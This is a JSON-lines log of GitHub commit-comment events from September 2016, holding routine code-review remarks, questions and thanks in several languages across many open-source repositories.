{"id":"4516409688","type":"CommitCommentEvent","actor":{"login":"Flameshot"},"repo":{"name":"FlameNET/FlameCMS"},"payload":{"comment":{"id":18898941,"position":null,"line":null,"path":null,"commit_id":"fe8b1a067d5875d5e865867f1eb123ebf7e714f8","created_at":"2016-09-05T11:22:00Z","updated_at":"2016-09-05T11:22:00Z","body":"@oneluiz and @adomasalcore3  so you regroup?"}},"created_at":"2016-09-05T11:22:00Z"}
{"id":"4516413253","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18898947,"position":null,"line":null,"path":null,"commit_id":"326dd5aac7a0492312d38e97916186eb70e1a192","created_at":"2016-09-05T11:22:59Z","updated_at":"2016-09-05T11:22:59Z","body":"Please, instead of telling me what I should do, do it :)"}},"created_at":"2016-09-05T11:22:59Z"}
{"id":"4516415666","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18898955,"position":null,"line":null,"path":null,"commit_id":"60d4a7dcf8ec761e3eeca03db690b0867b9e38c7","created_at":"2016-09-05T11:23:41Z","updated_at":"2016-09-05T11:23:41Z","body":"Hopefully this can be simplified when we have the generateDetectBundle feature merged in to master"}},"created_at":"2016-09-05T11:23:41Z"}
{"id":"4516416167","type":"CommitCommentEvent","actor":{"login":"NormalityBytes"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18898956,"position":26,"line":26,"path":"StrandkorbWAR/WebContent/pages/mieter.xhtml","commit_id":"00bb0955d48d8de73b7272fe3fd28a22f996fc96","created_at":"2016-09-05T11:23:49Z","updated_at":"2016-09-05T11:23:49Z","body":"Okay, jetzt sehe ich's. Warum nicht einfach als selectedStrandkorbService.selectedKorb ansprechen?"}},"created_at":"2016-09-05T11:23:49Z"}
{"id":"4516417526","type":"CommitCommentEvent","actor":{"login":"mkaluza"},"repo":{"name":"mkaluza/Samsung_STE_Kernel"},"payload":{"comment":{"id":18898960,"position":null,"line":null,"path":null,"commit_id":"be6d5ad419c6f6d72ca83e135b7d15613ae0d36c","created_at":"2016-09-05T11:24:12Z","updated_at":"2016-09-05T11:24:12Z","body":"@robcore thanks :) what is it you want to talk about?"}},"created_at":"2016-09-05T11:24:12Z"}
{"id":"4516418494","type":"CommitCommentEvent","actor":{"login":"ahdinosaur"},"repo":{"name":"pietgeursen/pull-dom-mutants"},"payload":{"comment":{"id":18898962,"position":null,"line":null,"path":null,"commit_id":"c4dc252adf199c67559f86326831706d8a092291","created_at":"2016-09-05T11:24:27Z","updated_at":"2016-09-05T11:24:27Z","body":"hey @pietgeursen, you might like `npm version`. for this, you could do `npm version patch` which will create a commit bumping the version and tag the commit with the new version. when doing this, remember to push tags with `git push origin master --tags`. cheers!"}},"created_at":"2016-09-05T11:24:27Z"}
{"id":"4516420032","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18898967,"position":5,"line":23,"path":"fastly-config.vcl","commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T11:24:50Z","updated_at":"2016-09-05T11:24:50Z","body":"Why did we remove the elapsed_msec parameter?"}},"created_at":"2016-09-05T11:24:50Z"}
{"id":"4516420292","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18898968,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-05T11:24:55Z","updated_at":"2016-09-05T11:24:55Z","body":"@nyalldawson Selecting 'Label every part of multi-part features' shows the missing labels. This is not correct as the visual box should not influence the multi-part aspect of a feature, but it makes the bug less severe. Shall I create an issue for this bug?"}},"created_at":"2016-09-05T11:24:55Z"}
{"id":"4516420407","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18898969,"position":null,"line":null,"path":null,"commit_id":"326dd5aac7a0492312d38e97916186eb70e1a192","created_at":"2016-09-05T11:24:57Z","updated_at":"2016-09-05T11:24:57Z","body":"I'm basically taking notes so I don't forget everything, sorry! ;-)"}},"created_at":"2016-09-05T11:24:57Z"}
{"id":"4516421715","type":"CommitCommentEvent","actor":{"login":"ahan1990"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18898971,"position":26,"line":26,"path":"StrandkorbWAR/WebContent/pages/mieter.xhtml","commit_id":"00bb0955d48d8de73b7272fe3fd28a22f996fc96","created_at":"2016-09-05T11:25:18Z","updated_at":"2016-09-05T11:25:18Z","body":"Okay probiers mal so wurde mir nur vom Tutorial so vorgeschlagen \r\n"}},"created_at":"2016-09-05T11:25:18Z"}
{"id":"4516423314","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18898979,"position":34,"line":76,"path":"fastly-config.vcl","commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T11:25:43Z","updated_at":"2016-09-05T11:25:43Z","body":"I've never used ESIs, I'll trust your implementation."}},"created_at":"2016-09-05T11:25:43Z"}
{"id":"4516424669","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18898981,"position":null,"line":null,"path":null,"commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T11:26:07Z","updated_at":"2016-09-05T11:26:07Z","body":"We should think about testing our vcl like Next does with theirs."}},"created_at":"2016-09-05T11:26:07Z"}
{"id":"4516425067","type":"CommitCommentEvent","actor":{"login":"alexbiehl"},"repo":{"name":"mrkkrp/text-metrics"},"payload":{"comment":{"id":18898982,"position":10,"line":82,"path":"cbits/text_metrics.c","commit_id":"1670bd495bb28666231391ac044a401fdbecde87","created_at":"2016-09-05T11:26:13Z","updated_at":"2016-09-05T11:26:13Z","body":"Why do you use malloc here? As you free the memory at the end of the procedure an alloca would suffice I guess. That would be much cheaper as the allocation would only bump the stack pointer."}},"created_at":"2016-09-05T11:26:13Z"}
{"id":"4516425336","type":"CommitCommentEvent","actor":{"login":"pietgeursen"},"repo":{"name":"pietgeursen/pull-dom-mutants"},"payload":{"comment":{"id":18898983,"position":null,"line":null,"path":null,"commit_id":"c4dc252adf199c67559f86326831706d8a092291","created_at":"2016-09-05T11:26:18Z","updated_at":"2016-09-05T11:26:18Z","body":"Oh damn that's great, thanks Mikey!\n\nOn Mon, 5 Sep 2016, 11:24 PM Mikey <notifications@github.com> wrote:\n\n> hey @pietgeursen <https://github.com/pietgeursen>, you might like npm\n> version. for this, you could do npm version patch which will create a\n> commit bumping the version and tag the commit with the new version. when\n> doing this, remember to push tags with git push origin master --tags.\n> cheers!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pietgeursen/pull-dom-mutants/commit/c4dc252adf199c67559f86326831706d8a092291#commitcomment-18898962>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKEUeoDvJvdUCx7fOcJEBhUoG-1Ii0eUks5qm_vsgaJpZM4J0-6T>\n> .\n>\n"}},"created_at":"2016-09-05T11:26:18Z"}
{"id":"4516427619","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18898989,"position":14,"line":1181,"path":"src/game/Spell.cpp","commit_id":"a1c1c23a950225631dcfd8a439affaf12e26815f","created_at":"2016-09-05T11:26:55Z","updated_at":"2016-09-05T11:26:55Z","body":"Yes there is maybe something to do here , maybe using AttackStart()...\r\nBut its not related to this patch :)"}},"created_at":"2016-09-05T11:26:55Z"}
{"id":"4516430577","type":"CommitCommentEvent","actor":{"login":"cy6erGn0m"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18898994,"position":37,"line":0,"path":"js/js.libraries/src/core/collections/AbstractList.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-05T11:27:44Z","updated_at":"2016-09-05T11:27:44Z","body":"what does it check? should be better diagnostics here. Also `IteratorImpl.remove` use `check(last != -1)`.  `check` vs `require` ?"}},"created_at":"2016-09-05T11:27:44Z"}
{"id":"4516430617","type":"CommitCommentEvent","actor":{"login":"oktawiraratama"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18898995,"position":null,"line":null,"path":null,"commit_id":"5360a9be50a6df2ce63f241ce8cf1dbad6badf46","created_at":"2016-09-05T11:27:46Z","updated_at":"2016-09-05T11:27:46Z","body":"BUG !!! \r\ncan't automatic transfer Ratata, Pidgey and Caterpie\r\nPlease fix it, thank's :)"}},"created_at":"2016-09-05T11:27:46Z"}
{"id":"4516431413","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18898996,"position":13,"line":88,"path":"README.md","commit_id":"fe65bc27602b18df5c1f7c339e3813db617dd657","created_at":"2016-09-05T11:27:58Z","updated_at":"2016-09-05T11:27:58Z","body":"This should also be added to the configuration section above."}},"created_at":"2016-09-05T11:27:58Z"}
{"id":"4516434145","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18899001,"position":null,"line":null,"path":null,"commit_id":"6fc692d3836a328d8be0b2e3f5e8874820af10f0","created_at":"2016-09-05T11:28:44Z","updated_at":"2016-09-05T11:28:44Z","body":":mans_shoe: "}},"created_at":"2016-09-05T11:28:44Z"}
{"id":"4516435451","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18899008,"position":5,"line":4,"path":"lib/rumTemplate.js.handlebars","commit_id":"fe65bc27602b18df5c1f7c339e3813db617dd657","created_at":"2016-09-05T11:29:07Z","updated_at":"2016-09-05T11:29:07Z","body":"Should this include a `:` before `{{{host}}}`?\r\n`//:{{{host}}}`"}},"created_at":"2016-09-05T11:29:07Z"}
{"id":"4516439860","type":"CommitCommentEvent","actor":{"login":"silverbucket"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18899019,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-05T11:30:18Z","updated_at":"2016-09-05T11:30:18Z","body":"OK, v2.4.2 is released with better phrasing :)"}},"created_at":"2016-09-05T11:30:18Z"}
{"id":"4516440051","type":"CommitCommentEvent","actor":{"login":"Leeyunger"},"repo":{"name":"Leeyunger/blog"},"payload":{"comment":{"id":18899020,"position":null,"line":null,"path":null,"commit_id":"d55b7ac15cb5ca8205893841b3e770e2d38d6c3f","created_at":"2016-09-05T11:30:21Z","updated_at":"2016-09-05T11:30:21Z","body":"the model of static web"}},"created_at":"2016-09-05T11:30:21Z"}
{"id":"4516441002","type":"CommitCommentEvent","actor":{"login":"cbernet"},"repo":{"name":"vhbb/cmssw"},"payload":{"comment":{"id":18899023,"position":50,"line":210,"path":"PhysicsTools/Heppy/python/analyzers/gen/GeneratorAnalyzer.py","commit_id":"6c490d9721339d3d0689239a4badaae6c1b42fa5","created_at":"2016-09-05T11:30:34Z","updated_at":"2016-09-05T11:30:34Z","body":"Hi, wouldn't it be better to keep the neutrinos from tau decays in the two lists? in this way gen neutrinos can be processed transparently irrespective of their source. "}},"created_at":"2016-09-05T11:30:34Z"}
{"id":"4516443146","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18899029,"position":null,"line":null,"path":null,"commit_id":"495d6d04e07665dca15ae3aa2561c1048ed6fd62","created_at":"2016-09-05T11:31:11Z","updated_at":"2016-09-05T11:31:11Z","body":"@SubJunk Oups...sorry. Corrected.\r\nI read to fast, like an other busy bee of our knowledge :wink: "}},"created_at":"2016-09-05T11:31:11Z"}
{"id":"4516445784","type":"CommitCommentEvent","actor":{"login":"cbernet"},"repo":{"name":"vhbb/cmssw"},"payload":{"comment":{"id":18899033,"position":80,"line":226,"path":"PhysicsTools/Heppy/python/analyzers/gen/GeneratorAnalyzer.py","commit_id":"6c490d9721339d3d0689239a4badaae6c1b42fa5","created_at":"2016-09-05T11:31:49Z","updated_at":"2016-09-05T11:31:49Z","body":"in the same way, i think it would be good to store the leptons from taus both in genleps and in gentauleps"}},"created_at":"2016-09-05T11:31:49Z"}
{"id":"4516453037","type":"CommitCommentEvent","actor":{"login":"Mortezarohandeh1"},"repo":{"name":"Mortezarohandeh1/hack_shop2bot"},"payload":{"comment":{"id":18899042,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-05T11:33:49Z","updated_at":"2016-09-05T11:33:49Z","body":"128799356"}},"created_at":"2016-09-05T11:33:49Z"}
{"id":"4516454208","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18899047,"position":15,"line":16,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"19207dd06fea0c17e3432699de59771909b0e0c0","created_at":"2016-09-05T11:34:10Z","updated_at":"2016-09-05T11:34:10Z","body":"https://msdn.microsoft.com/en-us/library/aa288470(v=vs.71).aspx"}},"created_at":"2016-09-05T11:34:10Z"}
{"id":"4516455167","type":"CommitCommentEvent","actor":{"login":"samedwards1989"},"repo":{"name":"samedwards1989/CSharpBeginnerExercises"},"payload":{"comment":{"id":18899052,"position":20,"line":13,"path":"CSharpBeginnerExercises/ControlFlow/Program.cs","commit_id":"4401b2ad129610e5fdcf009961af699d28f7739d","created_at":"2016-09-05T11:34:25Z","updated_at":"2016-09-05T11:34:25Z","body":"Should be\r\n'var input = Convert.ToInt32(Console.ReadLine());'"}},"created_at":"2016-09-05T11:34:25Z"}
{"id":"4516458415","type":"CommitCommentEvent","actor":{"login":"samedwards1989"},"repo":{"name":"samedwards1989/CSharpBeginnerExercises"},"payload":{"comment":{"id":18899063,"position":20,"line":13,"path":"CSharpBeginnerExercises/ControlFlow/Program.cs","commit_id":"4401b2ad129610e5fdcf009961af699d28f7739d","created_at":"2016-09-05T11:35:20Z","updated_at":"2016-09-05T11:35:20Z","body":"Should be\r\n 'var input = Convert.ToInt32(Console.ReadLine());"}},"created_at":"2016-09-05T11:35:20Z"}
{"id":"4516458485","type":"CommitCommentEvent","actor":{"login":"Lee-KangChen"},"repo":{"name":"Lee-KangChen/message_board"},"payload":{"comment":{"id":18899064,"position":null,"line":null,"path":null,"commit_id":"1d25ee69d508c08ee2e6561f9d0f08a119213039","created_at":"2016-09-05T11:35:22Z","updated_at":"2016-09-05T11:35:22Z","body":"that 2line codes I delets cause error.\r\n\r\n_post.html.erb\r\n<%= render partial: \"categories/category\", collection: post.categories %>\r\n\r\nshow.html.erb\r\n<%= render partial: \"categories/category\", collection: @post.categories %>\r\n"}},"created_at":"2016-09-05T11:35:22Z"}
{"id":"4516465304","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18899076,"position":4,"line":126,"path":"nuxeo-services/nuxeo-platform-web-common/src/main/java/org/nuxeo/ecm/platform/ui/web/auth/NuxeoAuthenticationFilter.java","commit_id":"38d7b2a0b240a1552cdafadbe5054070425d64b1","created_at":"2016-09-05T11:37:13Z","updated_at":"2016-09-05T11:37:13Z","body":"We're breaking the API and removing the constant on purpose because we don't want devs to keep using the old non-configurable startup page."}},"created_at":"2016-09-05T11:37:13Z"}
{"id":"4516467657","type":"CommitCommentEvent","actor":{"login":"alexrootways"},"repo":{"name":"bcit-ci/CodeIgniter4"},"payload":{"comment":{"id":18899080,"position":81,"line":85,"path":"system/Helpers/text_helper.php","commit_id":"934689adab5584b9422fdb0e7387373eeff32003","created_at":"2016-09-05T11:37:54Z","updated_at":"2016-09-05T11:37:54Z","body":"ok"}},"created_at":"2016-09-05T11:37:54Z"}
{"id":"4516470497","type":"CommitCommentEvent","actor":{"login":"snamds"},"repo":{"name":"snamds/SickRage"},"payload":{"comment":{"id":18899084,"position":2,"line":6,"path":"sickrage/recompiled/tags.py","commit_id":"196d0ebaddb2f501adc39a942acf9e50a38119ab","created_at":"2016-09-05T11:38:41Z","updated_at":"2016-09-05T11:38:41Z","body":"I didn't make this change because I don't know if this can be a problem with a 720 episode (7 season, 20 episode)"}},"created_at":"2016-09-05T11:38:41Z"}
{"id":"4516474705","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18899102,"position":8,"line":108,"path":"lib/mix/lib/mix/scm/git.ex","commit_id":"69bda84e0d7844f377c7dc307f55106c55d736c3","created_at":"2016-09-05T11:39:47Z","updated_at":"2016-09-05T11:39:47Z","body":"We don't use this style in Elixir. It should be:\r\n\r\n```elixir\r\n[\"--\",\r\n progress_switch(...),\r\n tags_switch(...)]\r\n```"}},"created_at":"2016-09-05T11:39:47Z"}
{"id":"4516478637","type":"CommitCommentEvent","actor":{"login":"JZzhao"},"repo":{"name":"JZzhao/Singapore-2012-PISA-"},"payload":{"comment":{"id":18899109,"position":null,"line":null,"path":null,"commit_id":"9e3df4453af8b14747bb1c9ca3f84cdd15b0ec12","created_at":"2016-09-05T11:40:50Z","updated_at":"2016-09-05T11:40:50Z","body":"CBAM dropbox, can view how CBAM data being handled."}},"created_at":"2016-09-05T11:40:50Z"}
{"id":"4516478782","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899110,"position":58,"line":27,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:40:53Z","updated_at":"2016-09-05T11:40:53Z","body":"Далеко не очивидная логика работы в этой строке. Попробуй для начала описать её комментом, а после просто подправить код."}},"created_at":"2016-09-05T11:40:53Z"}
{"id":"4516482883","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899119,"position":70,"line":35,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:42:04Z","updated_at":"2016-09-05T11:42:04Z","body":"для добавления в конец лучше использовать .push"}},"created_at":"2016-09-05T11:42:04Z"}
{"id":"4516483699","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899121,"position":59,"line":28,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:42:17Z","updated_at":"2016-09-05T11:42:17Z","body":"Для чего делается копирование данных?"}},"created_at":"2016-09-05T11:42:17Z"}
{"id":"4516487080","type":"CommitCommentEvent","actor":{"login":"emanci"},"repo":{"name":"emanci/emanci.github.io"},"payload":{"comment":{"id":18899130,"position":null,"line":null,"path":null,"commit_id":"223fe10d72284fa44519782d1f2fcbbfd8f6c6b5","created_at":"2016-09-05T11:43:10Z","updated_at":"2016-09-05T11:43:10Z","body":"排版太难看，有时间再重新搞一下界面"}},"created_at":"2016-09-05T11:43:10Z"}
{"id":"4516488099","type":"CommitCommentEvent","actor":{"login":"frivoal"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":18899135,"position":100,"line":2128,"path":"mediaqueries/Overview.bs","commit_id":"af397be9aca11109522ccfa51f5392aeb4eef045","created_at":"2016-09-05T11:43:23Z","updated_at":"2016-09-05T11:43:23Z","body":"Actually, I included security because information about the environment outside the browser can be useful in phishing attacks where the attacker attempts to imitate the OS's UI, and tricks the user into doing things they otherwise wouldn't.\r\n\r\nThe info exposed by these MQs isn't quite enough on its own to pull this off, but if it helps, I think considering it somewhat of a security risk isn't too far fetched."}},"created_at":"2016-09-05T11:43:23Z"}
{"id":"4516489954","type":"CommitCommentEvent","actor":{"login":"dhrubaz"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":18899142,"position":null,"line":null,"path":null,"commit_id":"54343cc5f66461477875616565c170b858acbec0","created_at":"2016-09-05T11:43:55Z","updated_at":"2016-09-05T11:43:55Z","body":"Kindly please add **SIM enable/ disable** option & also **Back-light keys turn off & turn on** option. Love you Resurrection Remix team."}},"created_at":"2016-09-05T11:43:55Z"}
{"id":"4516490171","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18899144,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T11:43:58Z","updated_at":"2016-09-05T11:43:58Z","body":"@fommil Look at the URL, it says \"latest\", not \"stable\"; and if you look at the installation command you'll see that it installs from `master`, not from a tag."}},"created_at":"2016-09-05T11:43:58Z"}
{"id":"4516490632","type":"CommitCommentEvent","actor":{"login":"giabaio"},"repo":{"name":"WillBrowne/SurvHE"},"payload":{"comment":{"id":18899146,"position":14,"line":87,"path":"survHE.R","commit_id":"819e05a998e0ffd6e78299826b8ebc1abf2c4f82","created_at":"2016-09-05T11:44:08Z","updated_at":"2016-09-05T11:44:08Z","body":"Do we *really* need to keep this? I think you were testing to see that you got the zero-trick OK?"}},"created_at":"2016-09-05T11:44:08Z"}
{"id":"4516491435","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899151,"position":92,"line":56,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:44:20Z","updated_at":"2016-09-05T11:44:20Z","body":"для чего пересоздаётся массив?"}},"created_at":"2016-09-05T11:44:20Z"}
{"id":"4516493363","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18899158,"position":null,"line":null,"path":null,"commit_id":"10e1a384247502fe32c61698e8d5d3ed5c4a88a3","created_at":"2016-09-05T11:44:51Z","updated_at":"2016-09-05T11:44:51Z","body":"you kinda messed the whole branch up"}},"created_at":"2016-09-05T11:44:51Z"}
{"id":"4516494321","type":"CommitCommentEvent","actor":{"login":"veelken"},"repo":{"name":"vhbb/cmssw"},"payload":{"comment":{"id":18899160,"position":80,"line":226,"path":"PhysicsTools/Heppy/python/analyzers/gen/GeneratorAnalyzer.py","commit_id":"6c490d9721339d3d0689239a4badaae6c1b42fa5","created_at":"2016-09-05T11:45:09Z","updated_at":"2016-09-05T11:45:09Z","body":"Hi,\n\nmy personal preference is to keep the lists exclusive.\n\nAt least in the VHbb Ntuple software that I am using there are upper cuts on the number of leptons and neutrinos that get stored in the Ntuples.\n(and I personally don’t mind merging the lists on analysis level)\n\nCheers,\n\n\nChristian\n\n> On 5 Sep 2016, at 13:31, Colin Bernet <notifications@github.com> wrote:\n> \n> in the same way, i think it would be good to store the leptons from taus both in genleps and in gentauleps\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/vhbb/cmssw/commit/6c490d9721339d3d0689239a4badaae6c1b42fa5#commitcomment-18899033>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AEwCTiEYeLdPuPV7JSBXcmh6JQ4ndH6Lks5qm_2ngaJpZM4J0_Ku>.\n> \n\n"}},"created_at":"2016-09-05T11:45:09Z"}
{"id":"4516499474","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18899167,"position":null,"line":null,"path":null,"commit_id":"1ba6af016889aa001a0cacc2ef9135631fd02920","created_at":"2016-09-05T11:46:31Z","updated_at":"2016-09-05T11:46:31Z","body":"and apparently it works **only** with ``g_unsetenv`` because ``\"\"`` leaves an [blank but not empty](https://forum.manjaro.org/t/manjaro-cinnamon-16-08/8435/35?u=oberon) envar I'm afraid... "}},"created_at":"2016-09-05T11:46:31Z"}
{"id":"4516500023","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899170,"position":141,"line":150,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:46:40Z","updated_at":"2016-09-05T11:46:40Z","body":"в таких случаях, если не предвидется дальнейших изменений тела последнего обработчика callback, то можно просто подать его параметром в transform без использования доп. анонимной функции. В данном случае разницы практически нет, так что менять не требуется."}},"created_at":"2016-09-05T11:46:40Z"}
{"id":"4516504705","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899175,"position":169,"line":193,"path":"api/dao.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:47:56Z","updated_at":"2016-09-05T11:47:56Z","body":"массивы на пустоту обычно проверяют через .length > 0"}},"created_at":"2016-09-05T11:47:56Z"}
{"id":"4516504976","type":"CommitCommentEvent","actor":{"login":"tugberkugurlu"},"repo":{"name":"Readify/Neo4jClient"},"payload":{"comment":{"id":18899176,"position":6,"line":85,"path":"Neo4jClient.nuspec","commit_id":"d1c2fd11faf9ff17f8cc5f7b9506a647e0d414fb","created_at":"2016-09-05T11:48:00Z","updated_at":"2016-09-05T11:48:00Z","body":"I assume you can create a NuGet package w/o the nuspec file, directly with `dotnet pack`. Is there a specific reason for you to go with a Nuspec file instead?"}},"created_at":"2016-09-05T11:48:00Z"}
{"id":"4516509950","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Seldar/phpmyadmin"},"payload":{"comment":{"id":18899182,"position":null,"line":null,"path":null,"commit_id":"57d6ac3077c126c044e1c811f628dfd42b7c8536","created_at":"2016-09-05T11:49:24Z","updated_at":"2016-09-05T11:49:24Z","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2016-09-05T11:49:24Z"}
{"id":"4516513510","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18899189,"position":null,"line":null,"path":null,"commit_id":"ba70ce28ae4032a4674634c2a00615f7a0908357","created_at":"2016-09-05T11:50:20Z","updated_at":"2016-09-05T11:50:20Z","body":"cc @nbp "}},"created_at":"2016-09-05T11:50:20Z"}
{"id":"4516514760","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899191,"position":13,"line":18,"path":"libs/loadUser.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:50:39Z","updated_at":"2016-09-05T11:50:39Z","body":"я так понимаю, что в данном случае ничего не поменялось по большому счёту, но начал сам путаться в логике. Можешь комментами описать код? особо интересуют ветвления и вызовы next с использованием и без return"}},"created_at":"2016-09-05T11:50:39Z"}
{"id":"4516516475","type":"CommitCommentEvent","actor":{"login":"fitzchak"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":18899193,"position":4,"line":23,"path":"test/FastTests/Server/Documents/Notifications/ChangesTests.cs","commit_id":"a3faefc4a478f320a07f17e62ba5eee81452fc2a","created_at":"2016-09-05T11:51:09Z","updated_at":"2016-09-05T11:51:09Z","body":"@aviviadi Without the [Fact] the test won't run..."}},"created_at":"2016-09-05T11:51:09Z"}
{"id":"4516526852","type":"CommitCommentEvent","actor":{"login":"cskardon"},"repo":{"name":"Readify/Neo4jClient"},"payload":{"comment":{"id":18899214,"position":6,"line":85,"path":"Neo4jClient.nuspec","commit_id":"d1c2fd11faf9ff17f8cc5f7b9506a647e0d414fb","created_at":"2016-09-05T11:53:55Z","updated_at":"2016-09-05T11:53:55Z","body":"Yes, the build service (MyGet) is all set up to use the nuspec and at present it's working ;) I don't know if MyGet supports `dotnet` yet either, and I'm pretty happy with the way it's going. The nuspec also defines the 'details' (Authors, Description etc)\r\n"}},"created_at":"2016-09-05T11:53:55Z"}
{"id":"4516527287","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899215,"position":17,"line":17,"path":"public/javascripts/book.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:54:02Z","updated_at":"2016-09-05T11:54:02Z","body":"напомни спросить тебя про необходимость подсчёта этих кликов"}},"created_at":"2016-09-05T11:54:02Z"}
{"id":"4516529556","type":"CommitCommentEvent","actor":{"login":"JKE-be"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18899218,"position":5,"line":10,"path":"odoo/addons/base/module/wizard/base_module_immediate_install.xml","commit_id":"bf43729d3e5a1319b0c0077384bef880d3dc46ce","created_at":"2016-09-05T11:54:36Z","updated_at":"2016-09-05T11:54:36Z","body":"or obj :) odoo/odoo@a1ebed44a3a6999c6bcb2dbf9f4bf48ac85bed26"}},"created_at":"2016-09-05T11:54:36Z"}
